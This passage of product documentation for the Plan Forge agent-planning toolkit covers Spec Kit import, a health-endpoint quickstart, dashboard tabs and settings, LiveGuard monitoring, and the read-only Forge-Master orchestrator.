defaultLane | tweak / feature / full | feature | Lane used when forge_crucible_submit is called without one. |
recursionDepth | 0–3 | 1 | Max child-smelt depth before the server refuses to spawn another. |
autoApproveAgent | boolean | false | When true, smelts with source: agent auto-finalize after the interview completes. Use with care. |
sourceWeights | sum 100 | 34/33/33 | Weighting for how Memory / Principles / Plans contribute to default answers in the interview. Server normalizes any sum to 100. |
staleDefaultsHours | 1–168 | 24 | If your Principles or profile file is newer than the smelt by this many hours, the interview flags a STALE_PRINCIPLES / STALE_PROFILE warning so you re-read before finalizing. |
--manual-import with a --reason.forge_crucible_preview to see criticalGaps[] with { field, reason, hint } for each missing answer. The interview will queue a question for each gap when you call ask next.planPath and the smelt's draft at draftPath before deciding. If you genuinely want to replace the existing plan, call finalize again with overwrite: true; the original moves to <phaseName>.replaced-<timestamp>.md.questionId that doesn't match the server's pending question. Re-fetch state via forge_crucible_preview (returns the active question) and retry. Common when two LLM clients drive the same smelt out of order.staleDefaultsHours in Config.recursionDepth in Config. Three is the hard ceiling, beyond that, extract a separate Phase.docs/plans/PROJECT-PRINCIPLES.md yet. Run /project-principles in Copilot chat, or create the file manually.Crucible's downstream surfaces have grown beyond the original chapter. None of these change the core interview → plan → hardener flow above; they extend it with feedback loops the rest of the system uses:
forge_tempering_drain round-loop (Ch 21 Audit Loop) re-probes a plan's gates until convergence, surfacing residual Crucible STALE_PRINCIPLES warnings as actionable findings rather than transient noise.forge_patterns_list's detectors can spot Crucible-stage anti-patterns alongside execution-stage ones.forge_crucible_* tool surface)
Plan Forge's native import path for Spec Kit artifacts, map spec.md, plan.md, tasks.md, and constitution.md directly into a Crucible smelt with zero re-specifying.
Spec Kit is an alternative entry path into Crucible. Read this chapter if your organization already writes formal specifications and you'd rather import them than answer the interactive interview. If you don't use Spec Kit, you can safely skip the whole chapter, nothing else in the manual depends on it.
When the Crucible intake scanner detects Spec Kit artifacts in your project, it offers to auto-import them rather than run the full interactive interview. The import flow maps four source files into Crucible's required schema in a single pass:
The diagram above shows the full mapping surface. Source fields on the left feed into the field mapper (center), which outputs a populated Crucible smelt (right). PROJECT-PRINCIPLES.md, if present, is applied as a policy overlay, tech-stack constraints and forbidden patterns are enforced pre-smelt so they don't need to be re-entered during hardening.
| File | Origin | What it provides |
|---|---|---|
spec.md |
/speckit.specify |
Feature title, goals array, out-of-scope boundaries, acceptance criteria. Maps to plan-title and objectives[] in the smelt. |
plan.md |
/speckit.plan |
Scope definition, slice list, and forbidden-actions table. Maps directly to scope, slices[], and forbidden-actions. |
tasks.md |
/speckit.tasks |
Per-slice task breakdown with task-id, owner, and status fields. Maps to slice.tasks[] and slice.status inside each slice entry. |
constitution.md |
/speckit.constitution |
Agent rules, commitments, and prohibitions. Imports as agent-constraints in the smelt, directly equivalent to Plan Forge's PROJECT-PRINCIPLES.md. |
Representative mapping from source to smelt schema:
| Source field | Crucible field | Notes |
|---|---|---|
spec.md → title | plan-title | Required. Import blocked if absent. |
spec.md → goals[] | objectives[] | Array preserved as-is. |
plan.md → scope | scope | Required. Import blocked if absent. |
plan.md → slices[] | slices[] | Each slice entry carries its own task list. |
plan.md → forbidden-actions | forbidden-actions | Merged with any rules derived from constitution.md. |
tasks.md → task-id | slice.tasks[] | Keyed to matching slice by position. |
tasks.md → status | slice.status | Carries prior execution state into the smelt. |
constitution.md → rules | agent-constraints | Enforced by the hardener during Step 2. |
PROJECT-PRINCIPLES.md | policy-overlay | Applied pre-smelt as non-negotiable constraint layer. |
spec.md lacks a title, or plan.md lacks a scope section, the importer halts with a SPECKIT_IMPORT_MISSING_FIELD error and reports which field is absent. No partial imports are written. Fix the source artifact and re-run.
There are three ways to trigger the Spec Kit import: via the Crucible CLI, via the MCP tool, or via pforge run-plan auto-detection.
The most explicit path. Run the import command from the project root where the Spec Kit artifacts live:
# Import from default Spec Kit artifact locations
pforge crucible import --from=spec-kit
# Import from a non-default directory
pforge crucible import --from=spec-kit --dir=specs/my-feature
# Dry run: validate the mapping without writing a smelt
pforge crucible import --from=spec-kit --dry-run
The importer scans for spec.md, plan.md, tasks.md, and constitution.md in the specified directory (defaults to the repo root and common sub-paths: specs/, memory/, .speckit/). It reports which files were found, which fields mapped cleanly, and which fields were absent or required manual resolution.
From any MCP client (Copilot Chat, Claude Code, Cursor):
forge_crucible_import({
source: "spec-kit",
dir: "specs/my-feature", // optional, defaults to repo root scan
dryRun: false
})
Returns a structured result: { ok, smeltId, mappedFields[], missingFields[], warnings[] }. If ok is false, the missingFields array tells you exactly what to fix.
pforge run-planWhen you run a plan that was generated from a Crucible smelt, the orchestrator checks whether the smelt originated from a Spec Kit import. If so, LiveGuard's PostSlice hook automatically compares each completed slice against the original spec.md acceptance criteria, providing drift detection that goes back to the original specification, not just the hardened plan.
pforge run-plan docs/plans/my-feature-PLAN.md
No extra flags needed. The Spec Kit provenance is embedded in the smelt metadata at import time.
/speckit.specify, /speckit.plan, /speckit.tasks, and /speckit.constitution in your Spec Kit–enabled IDE. This produces spec.md, plan.md, tasks.md, and constitution.md.pforge crucible import --from=spec-kit. Confirm the field mapping report looks correct.pforge crucible status. Adjust any field overrides before hardening./step2-harden-plan prompt in Copilot Chat, or invoke forge_crucible_harden from any MCP client. This produces the execution-ready plan file with validation gates.pforge run-plan docs/plans/my-feature-PLAN.md. Spec Kit provenance in the smelt metadata activates LiveGuard drift checks against spec.md criteria throughout the run.| Warning / error | Cause | Fix |
|---|---|---|
SPECKIT_IMPORT_MISSING_FIELD |
A required field (title, scope) is absent from its source file. |
Edit the Spec Kit artifact and re-run the import. Use --dry-run to verify before committing. |
SPECKIT_IMPORT_AMBIGUOUS_SLICE |
A tasks.md task references a slice name that doesn't exist in plan.md. |
Ensure slice names match exactly. Case-sensitive. Re-run /speckit.tasks if tasks were generated before the final plan. |
SPECKIT_IMPORT_POLICY_CONFLICT |
PROJECT-PRINCIPLES.md forbids a pattern that constitution.md or plan.md permits. |
PROJECT-PRINCIPLES.md wins, it is the non-negotiable layer. Update the Spec Kit artifact to align with your project principles, or remove the conflicting rule from constitution.md. |
tasks.md → status import skipped |
The Spec Kit tasks.md uses a status vocabulary Plan Forge doesn't recognize (e.g. in-review). |
The importer maps done → done, in-progress → in_progress, and everything else → pending. Status values in the smelt can be manually adjusted before hardening. |
The Spec Kit interop surface is part of Plan Forge's broader ecosystem integration layer. Beyond the four core import files, several extension points allow deeper interop between the two tools.
Spec Kit's 40+ community extensions generate additional artifact types that Plan Forge can consume. When an extension produces a structured markdown artifact with a known schema, the Crucible importer attempts to map it. Currently supported extension artifact types:
| Extension artifact | Plan Forge mapping |
|---|---|
| Security spec (from security-focused speckit extensions) | Mapped to security-constraints in the smelt; activates security.instructions.md auto-loading |
| Database schema spec | Mapped to the database-schema smelt field; activates database.instructions.md |
| API contract spec | Mapped to api-contract; activates api-patterns.instructions.md |
| Test plan spec | Mapped to test-strategy; activates testing.instructions.md |
Extensions that produce non-standard artifact shapes are queued in the smelt's unresolved section for manual review, no extension output is silently dropped.
The flow isn't one-directional. Plan Forge can export a completed plan back to Spec Kit format for teams that want to archive specs alongside the implementation:
# Export the hardened plan as Spec Kit artifacts
pforge crucible export --to=spec-kit docs/plans/my-feature-PLAN.md
# Output: spec.md, plan.md, tasks.md written to ./speckit-export/
This is useful when different team members work in different tools: the architect specifies in Spec Kit, the builder executes in Plan Forge, and the archived spec stays in Spec Kit format for documentation consistency.
Spec Kit's constitution.md and Plan Forge's PROJECT-PRINCIPLES.md serve the same function: declaring non-negotiable constraints for AI agents. When both files exist in a project, Plan Forge merges them at import time using a last-writer-wins policy (Plan Forge's file takes precedence on conflicts), then presents the unified rule set to the hardener. The merge report is included in the smelt metadata so you can audit exactly which rules came from each source.
constitution.md as the authoritative source (edited via /speckit.constitution) and let Plan Forge's import sync it to PROJECT-PRINCIPLES.md automatically. Use pforge crucible import --from=spec-kit --sync-principles to update PROJECT-PRINCIPLES.md in place.
When using Plan Forge's multi-agent mode, each agent worker receives the Spec Kit provenance metadata in its slice context. This means a Copilot Coding Agent worker dispatched via pforge run-plan --worker copilot-coding-agent receives the original spec.md acceptance criteria alongside the Plan Forge scope contract, both constraint systems are active simultaneously.
Plan Forge's Spec Kit interop is registered as a first-class community extension. You can inspect its schema, version history, and compatibility notes via:
pforge ext info spec-kit-interop
For the full Plan Forge extension surface (browsing, installing, and authoring community extensions), see Chapter 12: Extensions.
Hands-on: specify, harden, and execute a real feature in 30 minutes.
pforge smith shows all green. You have VS Code + Copilot ready.
A GET /health endpoint. It's deliberately simple, the point is to learn the pipeline, not build something complex. You'll run the full 7-step flow (Specify → Pre-flight → Harden → Execute → Sweep → Review → Ship) on a feature that takes 15 minutes to code, so you can focus on how the system works.
Ctrl+Shift+I (Windows) or Cmd+Shift+I (Mac).github/prompts/step0-specify-feature.prompt.md<FEATURE-NAME> with health-endpoint and sendThe agent interviews you. Here are example answers for a health endpoint:
Problem: Load balancers need to verify the service is running.
Scenarios: GET /health every 30s. Expects 200 OK with {"status":"healthy"}.
Criteria: Returns 200 with JSON. Under 50ms. No auth required.
Edge cases: If DB unreachable → 503 {"status":"degraded","reason":"database"}.
Out of scope: No deep checks (Redis, APIs). No metrics endpoint.
The agent compiles your answers into a specification and creates docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md.
Still in the same chat session:
.github/prompts/step1-preflight-check.prompt.md<YOUR-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and sendThe agent checks git state, guardrail files, and the roadmap. Everything should pass. If something fails, it tells you exactly what to fix.
.github/prompts/step2-harden-plan.prompt.md<YOUR-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and sendThe agent adds the mandatory blocks to your plan. When it says "Plan hardened", Session 1 is done.
Open the plan file. Every hardened plan has these sections, here's what each means:
# Phase 1, Health Endpoint
## Scope Contract ← What files the AI can touch
In Scope: src/controllers/**, tests/health/**
Out of Scope: frontend, deployment, CI/CD
Forbidden Actions: Do NOT modify src/database/migrations/
## MUST Criteria ← Required outcomes (non-negotiable)
- [ ] GET /health returns 200 with JSON body
- [ ] 503 when database unreachable
- [ ] Response time under 50ms
## SHOULD Criteria ← Nice to have (best-effort)
- [ ] Structured logging on health check calls
## Execution Slices ← Checkpointed work chunks
### Slice 1, Health Controller [30 min]
Tasks: Create controller, route, response model
Gate: `dotnet build` passes ← Must pass before Slice 2
Stop if: Build fails ← Halts execution
### Slice 2, Tests + Edge Cases [30 min]
Tasks: Unit tests, 503 degraded scenario
Gate: `dotnet test`, 4+ tests pass
Stop if: Any test regresses
## Branch Strategy
Branch: feature/phase-1-health-endpoint
## Rollback Plan ← How to undo if things go wrong
1. `git revert HEAD~2`
| Section | Purpose | What Goes Wrong Without It |
|---|---|---|
| Scope Contract | Boundaries: what's in, out, forbidden | AI refactors unrelated files |
| MUST Criteria | Non-negotiable requirements | Features ship incomplete |
| Execution Slices | 30–120 min checkpointed chunks | Monolithic changes, late failure discovery |
| Validation Gates | Build/test commands at each boundary | Broken code propagates to next slice |
| Stop Conditions | When to halt instead of working around | AI hacks around failures |
| Rollback Plan | How to revert if needed | Panic when things break |
Three ways to execute, pick one:
pforge run-plan docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
Kick off and walk away. Watch progress at localhost:3100/dashboard.
pforge run-plan --assisted docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
You code in VS Code. Orchestrator validates gates automatically.
Start a new Copilot session. Attach step3-execute-slice.prompt.md. The AI reads the plan and executes slice by slice.
The agent creates the health endpoint, runs build, runs test, and reports pass/fail at each gate. If a gate fails, execution stops, no silent failures.
After execution, the completeness sweep scans for deferred-work markers:
pforge sweep
It searches all code for TODO, FIXME, HACK, stub, placeholder, mock data. For a health endpoint, this should find zero. If it finds anything, resolve it before review.
Start a NEW chat session, click the + button. This is critical: the reviewer must not carry context from the builder.
.github/prompts/step5-review-gate.prompt.md<YOUR-HARDENED-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and sendThe reviewer checks all changes against the Scope Contract: forbidden files, architecture compliance, test coverage, scope creep. For a health endpoint, expect a clean PASS.
.github/prompts/step6-ship.prompt.mdfeat(health): add GET /health endpointDEPLOYMENT-ROADMAP.md to mark the phase completeSession 1 (Specify & Plan) → You described what you wanted, the AI structured it
Session 2 (Execute) → The AI built it slice-by-slice with validation gates
Session 3 (Review) → A fresh AI session checked for mistakes and drift
Session 4 (Ship) → The AI committed, updated docs, captured lessons
Each session was isolated, the reviewer didn't carry bias from the builder. Every step had guardrails loaded automatically from your .github/instructions/ files.
Instead of attaching prompt files, use pipeline agents with handoff buttons:
Same pipeline, fewer steps. The prompt template approach is better for learning; agents are better for daily use.
📄 Full reference: Quickstart — Install, greenfield-todo-api walkthrough on GitHub
37 tabs across 4 top-level groups (Forge / LiveGuard / Forge-Master / Settings). Real-time execution monitoring, cost tracking, session replay, one-click actions, watcher live feed, and LiveGuard health.
The dashboard is part of the MCP server (Model Context Protocol, the standard that lets AI agents call functions). Start it, then open your browser:
# Full MCP server (stdio + HTTP + WebSocket)
node pforge-mcp/server.mjs
# Dashboard + REST API only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only
Open localhost:3100/dashboard. The dashboard connects via WebSocket on port 3101 for real-time updates.
.vscode/mcp.json configured (created during setup), the MCP server starts automatically when Copilot uses a forge tool. The dashboard is always available at port 3100 while the server runs.
The dashboard groups its tabs into 4 top-level groups (Forge / LiveGuard / Forge-Master / Settings). Knowing which group a tab lives in is the fastest way to find what you're looking for, especially across the 37 tabs total. Click a group tab in the top nav to expose its sub-tabs.
| Group | Tabs | Purpose |
|---|---|---|
| Forge (19) | Home, Review, Progress, Crucible, Governance, Runs, Cost, Actions, Replay, Traces, Skills, Tempering, Memory, Timeline, Inner Loop, Extensions, Anvil/Lattice, GitHub Metrics, Team Dashboard | Build, execute, ship; active-run monitoring |
| LiveGuard (7) | Health, Incidents, Triage, Security, Env, Watcher, Bug Registry | Post-deploy defense |
| Forge-Master (1) | Studio | Read-only reasoning orchestrator |
| Settings (10) | General, Models, Execution, API Keys, Updates, Memory, Bridge, Crucible, Brain, Forge-Master | Platform-wide config (safe-write to .forge.json) |
The default view during plan execution. This is where you watch your plan come to life, real-time slice status via WebSocket updates:
Each card shows: slice title, status (queued → executing → passed/failed), duration, model used, token count, and cost. Cards update in real-time as events arrive over WebSocket.
History of all plan executions. Each row shows:
| Column | Content |
|---|---|
| Plan | Plan file path (clickable → shows slice detail) |
| Status | ✓ Complete, ✗ Failed, ● Partial |
| Slices | Passed / Total count |
| Duration | Total wall-clock time |
| Cost | Total USD across all slices |
| Model | Primary model used |
| Date | Execution timestamp |
Click any row to expand slice-by-slice detail: per-slice tokens, duration, model, and pass/fail status.
Two visualizations:
Data comes from .forge/cost-history.json which is updated automatically after each run. The cost tab supports a 23-model pricing table, including Claude, GPT, Grok, Gemini, and custom API providers.
pforge run-plan --estimate to predict costs before executing.
One-click buttons for common operations, no terminal needed:
Each button calls a forge MCP tool through the generic /api/tool/:name dispatcher (e.g. POST /api/tool/forge_smith, POST /api/tool/forge_sweep) and displays results inline.
Browse agent session logs from past executions. Each run's .forge/runs/<timestamp>/ directory contains per-slice logs. The Replay tab renders them with:
Use this to diagnose why a slice failed, the full agent conversation, including tool calls, is captured.
Visual catalog browser with search. Shows all community extensions from extensions/catalog.json:
Equivalent to pforge ext search + pforge ext add but with a visual interface.
OTLP (OpenTelemetry Protocol) trace waterfall view. Every plan execution emits OpenTelemetry spans:
| Span | What It Captures |
|---|---|
| run (root) | Plan file, total duration, slice count, model |
| └ slice-N | Slice title, status, tokens in/out, cost, gate result |
| └ gate | Gate command, exit code, output |
| └ escalation | If a model failed and escalated to the next in chain |
Click any span to expand: duration, resource attributes (project, version, preset), severity. Traces are stored in .forge/runs/<timestamp>/traces.json and can be exported to any OTLP-compatible backend (Jaeger, Grafana Tempo, etc.).
Monitor skill executions triggered via forge_run_skill or /slash-command. Shows:
skill-started, skill-step-completed, skill-completed)
Read-only view of another project's pforge run, consumed from a second VS Code / Copilot session. Subscribes to watch-snapshot-completed, watch-anomaly-detected, and watch-advice-generated hub events emitted by forge_watch / forge_watch_live. Shows:
stalled, slice-failed, quorum-dissent, quorum-leg-stalled, skill-step-failed, model-escalated, etc.) with message + run IDpforge watch-live / pforge watch invocationsLive feed of narrations produced by the Forge-Master Observer — the background hub subscriber that batches live plan events and narrates notable patterns in plain prose. The card renders the last 20 narrations, updating in real time via the existing dashboard WebSocket (observer:narration event type).
observer:narration hub events emitted from pforge-master/src/observer-loop.mjs; narrations are also stored in Brain via brain_capture if cfg-observer-brain-capture is enabled
Retrospective health view powered by forge_watch({ mode: "cross-run" }). Aggregates .forge/runs/*/summary.json files into a health snapshot and surfaces recurring failure patterns across your run history — useful for diagnosing systemic issues that individual-run views miss.
GET /api/watcher/cross-run server-side (wraps the cross-run watcher), rendering fresh results within 2 s for repos with ≤ 50 runs.forge/cross-run-cache.json with a 1-hour TTL; the cached result loads automatically on page load so the card is never blankcross-run.recurring-gate-failure, cross-run.retry-rate-spike, cross-run.cost-anomaly-trend, cross-run.slice-timeout-cluster), severity, recommendation
Renders the most recent Plan-Health Auditor report from .forge/health/latest.md directly on the dashboard. The auditor is invoked automatically after failed runs or every N runs (configurable in Settings → Forge-Master).
<script> tags, raw HTML injection, <iframe>, and javascript: URLs are all stripped server-side before the response leaves GET /api/auditor/latest; safe elements (headings, lists, code blocks, bold/italic) render normally.forge/health/ archive listing so you can browse older reportsGET /api/auditor/latest returns { markdown, timestamp, archive: [...] }
The audit loop is opt-in. It's not on a Settings tab, mode is read from .forge.json#audit.mode directly:
off (default) / auto / alwaysdev and staging by default; production is hard-blocked unless allowProduction: true in scanner opts (and even then only with explicit override)tempering-round-completed hub events and surface in the Forge → Tempering tabTrigger manually with pforge audit-loop --auto (respects .forge.json#audit.mode) or via the forge_tempering_drain MCP tool. See Audit Loop deep dive for the full activation flow.
Unified chronological view of every event across the shop. Source chips filter the feed:
run, plan executions (slice progress, completes, aborts)incident, LiveGuard incident lifecyclebug, Bug Registry status changesdeploy, forge_deploy_journal entriescrucible, smelt lifecycle (started / question / finalized)fm-turn v2.82, Forge-Master turns (lane + truncated user message + turn number)memory, memory-captured events from OpenBraintempering, audit-loop drain roundswatch, watcher snapshot / anomaly / advice eventsThe CLI equivalent is pforge timeline, same 9 sources, same correlation-id grouping, JSON-pipeable for scripts.
| Port | Protocol | Purpose |
|---|---|---|
3100 | HTTP | Dashboard UI + REST API |
3101 | WebSocket | Real-time events (slice progress, run completion) |
PORT and WS_PORT environment variables, or use --port flag: node pforge-mcp/server.mjs --port 4100.
📄 Full reference: capabilities, Appendix V — Event Catalog (every WebSocket event with payload and retention), EVENTS.md on GitHub (raw JSON schema)
9 purpose-built sub-tabs for platform-wide configuration. Part of Chapter 7: The Dashboard.
The Settings group is a top-level container with 9 purpose-built sub-tabs for platform-wide configuration. It replaced the older single Config tab. Settings is one of four top-level groups in the dashboard nav:
Click Settings in the top nav and you'll see 9 purple-accented sub-tabs. Every tab persists changes to its specific config file via the dashboard's safe-write path (sanitizer drops unknown fields, snaps numbers to safe bounds, no UI bug can corrupt your config).
Project identity: preset, template version, and agent enablement.
setup.ps1 -Preset <name>.pforge update bumps this..forge.json#agents.
Model routing: default execution model and image generation model selection.
auto (orchestrator picks per slice), or pin to a specific modelXAI_API_KEY) or DALL-E (OPENAI_API_KEY) for diagrams and chapter heroes via forge_generate_image
Per-slice execution behavior: quorum mode, escalation chain, complexity threshold, retry policy. The most-edited Settings tab during day-to-day work.
Stores API keys in .forge/secrets.json (gitignored). Same precedence as env vars: anything set here is picked up by the orchestrator without restarting the server.
XAI_API_KEY, Grok models + Aurora image generationOPENAI_API_KEY, GPT models direct + DALL-E (also enables OpenAI fallback for COPILOT_SERVABLE models)ANTHROPIC_API_KEY, Claude direct (Forge-Master + workers without claude CLI)Values are masked on display. The "Test" button against each key validates by calling the provider's lightweight endpoint, never the full reasoning model.
Framework version status + one-click pforge self-update from upstream. Surfaces version drift between your local VERSION and GitHub's latest release.
OpenBrain wiring: server URL, MCP credentials, project scope. See Chapter 21 — Memory Architecture for the three-tier model.
Remote Bridge endpoints for Slack / Teams / PagerDuty / OpenClaw / Telegram / Discord. See Chapter 20 — Remote Bridge for the per-channel walkthrough.
Idea-smelting pipeline configuration. Persists to .forge/crucible/config.json.
tweak (4q) / feature (7q) / full (~12q). Lane controls interview length.source: agent, finalize without human approval (off by default)STALE_PRINCIPLES/STALE_PROFILE in the interview
Forge-Master reasoning configuration: reasoningModel, routerModel, quorumAdvisory, embeddingFallback, GitHub Models zero-key path. See Forge-Master → Configuration for every field.
.forge.json#audit.mode (off | auto | always) and is toggled via the Audit Loop chapter. Drain results stream into the Tempering tab in the Forge group.
Configuration for Forge-Master's autonomous background roles: the Observer (live narration of hub events) and the Auditor (automated post-run health analysis). Both are off by default — enable each role with one click here or by editing .forge.json directly.
The Observer is a mute-by-default background hub subscriber. When enabled it batches live plan events into 60-second windows and narrates notable patterns via the Forge-Master reasoning loop. Narrations are stored in Brain and stream to the Observer Narrations card on the main dashboard view.
| Field ID | Type | Default | Effect |
|---|---|---|---|
cfg-observer-enabled | checkbox | off | Enables/disables the observer process. Maps to forgeMaster.observer.enabled. |
cfg-observer-modeltier | select | inherit | Model quality tier for narration calls. inherit uses the Brain reasoningModel; other options: flagship, mid, fast. See Model tier dropdown below. |
cfg-observer-budget-usd | number | 0.10 | Daily USD spending cap. Rejects negative values. Maps to forgeMaster.observer.maxUsdPerDay. |
cfg-observer-budget-narrations | number | 6 | Hourly narration frequency cap. Rejects negative values. Maps to forgeMaster.observer.maxNarrationsPerHour. |
cfg-observer-batch-window-ms | number | 60000 | Event batch window in milliseconds. Lower values produce more frequent (and expensive) narrations. Maps to forgeMaster.observer.batchWindowMs. |
cfg-observer-brain-capture | checkbox | on | Whether narrations are written to Brain (via brain_capture) in addition to the hub event stream. Disable to reduce Brain storage usage. Maps to forgeMaster.observer.brainCapture. |
The Auditor automatically invokes the Plan-Health Auditor agent after runs, writing reports to .forge/health/latest.md. Results are surfaced on the Auditor Latest Report card.
| Field ID | Type | Default | Effect |
|---|---|---|---|
cfg-auditor-modeltier | select | inherit | Model quality tier for auditor analysis. Same four canonical tokens as the observer tier. Maps to forgeMaster.auditor.modelTier. |
cfg-auditor-on-failure | checkbox | off | Invoke the auditor automatically whenever a run ends in failure. Maps to hooks.postRun.invokeAuditor.onFailure. |
cfg-auditor-every-n-runs | number | blank (off) | Invoke the auditor periodically every N runs. Leave blank to disable periodic invocation. Values 1–4 are rejected — the minimum opt-in value is 5 (reasonable cadence; see Resolved Decision in Phase-40 plan). Maps to hooks.postRun.invokeAuditor.everyNRuns. |
Both the Observer and Auditor share the same four canonical model-tier tokens. The UI displays human-friendly labels while the backend stores the canonical token in .forge.json:
| UI label | Canonical token | Meaning |
|---|---|---|
| Inherit from Brain settings | null / inherit | Uses the reasoningModel configured in Settings → Brain |
| Flagship (best quality) | flagship | Highest-capability model in the configured provider (e.g., Claude Opus, GPT-4o) |
| Balanced | mid | Mid-tier model — good quality at lower cost |
| Fast (low cost) | fast | Fastest, cheapest model — suitable for high-frequency narrations |
Cross-references: forgeMaster.observer schema · forgeMaster.auditor schema.
The reasoning orchestrator's home in the dashboard. Part of Chapter 7: The Dashboard.
The reasoning orchestrator's home. See the Forge-Master chapter for the deep dive. Three panels:
POST /api/forge-master/chat to start, then subscribes to GET /api/forge-master/chat/:sessionId/stream. Shows live classification badge with the via field (keyword / embedding-cache / router-llm), quorum-estimate cost preview if advisory mode triggers (with cancel button), live tool-call trace, and the streaming reply token-by-token.GET /api/forge-master/cache-stats. Shows {size, hitRate, maxSize: 500}. When cold, displays a hint that hits start once you've used Forge-Master a few times.Every Forge-Master response shows a classification badge indicating how the intent was routed:
| Via value | Meaning |
|---|---|
keyword | Fast-path: matched by keyword rules, no model call for routing |
embedding-cache | Hit the write-through embedding cache, free re-route |
router-llm | Router model called to classify intent (stage 3 fallback) |
When quorumAdvisory is set to auto or always in Settings → Brain, advisory-lane responses show a quorum-estimate cost preview before the models are called. A cancel button aborts the quorum dispatch if the estimated cost is too high.
The Studio tab maintains a persistent per-tab session ID in sessionStorage and sends it as x-pforge-session-id on every request. This means prior turns survive page reloads and New Chat resets, Forge-Master can reference earlier messages in the same browser tab session.
Session history is stored as JSONL in .forge/fm-sessions/. Use pforge fm-session list to inspect sessions or pforge fm-session purge to clean up. Sessions auto-rotate at 200 turns.
Forge-Master turns are indexed as the fm-turn source in the Timeline tab. Each entry shows the lane, a truncated user message, and turn number. Useful for correlating reasoning decisions with plan execution events.
Five amber-accented tabs for post-deploy defense: Health, Incidents, Triage, Security, and Env. Part of Chapter 7: The Dashboard.
Five amber-accented tabs separated by a visual divider from the FORGE section. LiveGuard tools (forge_drift_report, forge_regression_guard, forge_incident_capture, forge_secret_scan, forge_env_diff, forge_liveguard_run, etc.) broadcast liveguard + liveguard-tool-completed events that populate these tabs in real time.
Composite project health fingerprint produced by forge_health_trend and forge_liveguard_run:
forge_liveguard_run.forge/health-dna.json for cross-session decay detectionOpen and recently resolved incidents captured by forge_incident_capture and auto-chained from drift:
highforge_regression_guard passes on overlapping scopeforge_fix_proposal plans linked to the originating incident are surfaced inlinePrioritized alert stream from forge_alert_triage:
pforge-mcp/, pforge.*, setup.* paths are excluded from app-code scoringSecret hygiene and dependency vulnerability posture:
forge_secret_scan, masked as <REDACTED>, confidence high / medium / lowforge_dep_watch output for npm (npm audit) and .NET (dotnet list package --vulnerable)hooks.preDeploy is enabledEnvironment-variable drift between local .env, example templates, and deploy targets via forge_env_diff:
.env.example / deploy config but absent from local .envforge_deploy_journal entry
A read-only reasoning orchestrator with its own dashboard tab. Classifies intent, pulls OpenBrain memory, and chains read-only forge tools on your behalf, so you can ask open-ended questions instead of wiring tool calls by hand.
Plan Forge has 102 MCP tools. Most of the time you know which one you need. But sometimes you don't, sometimes the question is open-ended:
forge_watch_live + brain_recall + forge_bug_listforge_status + forge_plan_statusforge_search + brain_recall for prior decisions + maybe forge_diagnoseChaining the right tools by hand is slow and easy to get wrong. Forge-Master is the front door: one prompt in, one synthesized answer out. Behind the scenes it classifies your intent, pulls relevant memory, and orchestrates whatever read-only tools fit.
.forge.json, or finalize a smelt. That guarantee is what makes it safe to ask anything at any time. When the answer requires a write, Forge-Master tells you the exact tool to call yourself.
| Surface | Best for | Where |
|---|---|---|
| Studio tab | Interactive exploration with prompt gallery, streaming chat, live tool-call trace | localhost:3100/dashboard → Studio |
forge_master_ask MCP tool | Agents that want one-shot reasoning embedded in a larger conversation | Any MCP-compatible client (Copilot, Claude Code, Cursor, Codex, Windsurf) |
pforge forge-master status|logs | Scripts, CI checks, health probes | CLI |
forge_master_ask toolThe MCP tool is a one-shot entry-point:
forge_master_ask {
message: "Why did Phase-27 Slice 4 fail?"
}
→ {
ok: true,
lane: "troubleshoot",
via: "router-llm", // or "keyword" / "embedding-cache"
toolCalls: [
{ name: "forge_watch_live", args: { phase: "27", slice: 4 } },
{ name: "brain_recall", args: { query: "Phase-27 slice 4 failures" } }
],
reply: "The slice failed because…",
costUSD: 0.0023
}
forge_master_ask over manually calling individual forge tools when the task is open-ended or involves multiple steps. Don't use it for direct file edits, Forge-Master is read-only."
Every prompt is classified into a lane before tools are dispatched. The classifier runs three stages in order, falling through only when the prior stage didn't match confidently. This keeps the common case free (keyword) and the edge case smart (router LLM).
Fast regex/keyword match against per-lane vocabularies. Zero API cost. Returns immediately if confidence is high. Covers the bulk of operational prompts ("open bugs", "failing gate", "scope contract violation", etc.).
Cosine-similarity match (≥ 0.85) against previously-classified prompts. Zero API cost on hit. Uses all-MiniLM-L6-v2 via @xenova/transformers (lazy-loaded peer dep), or a deterministic hash bag-of-words fallback when the package isn't installed. Works fully offline once warm.
Default model: grok-3-mini. Used for ambiguous prompts the cache hasn't seen. Every successful classification is then written through to the cache, so the next similar prompt skips this stage entirely.
Each successful turn carries a via field telling you which stage answered: "keyword", "embedding-cache", or "router-llm". The dashboard's Forge-Master tab summarizes the distribution as {keyword, embedding, router} percentages.
Forge-Master classifies into one of these lanes. Each lane has a different default tool allowlist:
| Lane | Use case | Quorum-eligible? |
|---|---|---|
operational | Status queries, run lookups, "what's happening", reads runs, plan status, costs | No (hard-blocked) |
troubleshoot | Failure diagnosis, reads logs, watch-live, bugs, traces | No (hard-blocked) |
build | "How would I build X", reads patterns, runbooks, prior plans | No (hard-blocked) |
advisory | Open-ended judgment calls, "should we…", "which approach…", "what's the trade-off…" | Yes (default escalation target for quorum advisory) |
offtopic | Catch-all when nothing else matches; routed to a polite fallback reply | No |
For high-stakes decisions in the advisory lane, Forge-Master can fan the prompt out to 2–3 models in parallel and return all replies plus a dissent summary. The human picks the reply, there's no auto-winner selection, because the whole point is to surface disagreement.
pforge run-plan execution. See the side-by-side comparison in Chapter 14 for when to use which.
Set quorumAdvisory in .forge.json → forgeMaster:
| Mode | When quorum fires |
|---|---|
"off" (default) | Never. Single-model reply only. |
"auto" | Lane is advisory AND prompt was auto-escalated to the high tier AND classifier confidence is medium or above. The conservative trigger. |
"always" | Every advisory-lane prompt fires quorum. Highest spend, highest signal. |
"always", those lanes get a single-model reply. Quorum is for judgment, not for lookups.
Before any model is called, the GET /api/forge-master/chat/:sessionId/stream endpoint emits a quorum-estimate SSE event with the projected cost. Studio displays this and lets you cancel before spending. Programmatic clients should listen for the event:
data: {"type":"quorum-estimate","models":3,"estimatedUSD":0.0142,"models":[
{"name":"claude-opus-4.7","estUSD":0.0061},
{"name":"gpt-5.3-codex","estUSD":0.0048},
{"name":"grok-4.20","estUSD":0.0033}
]}
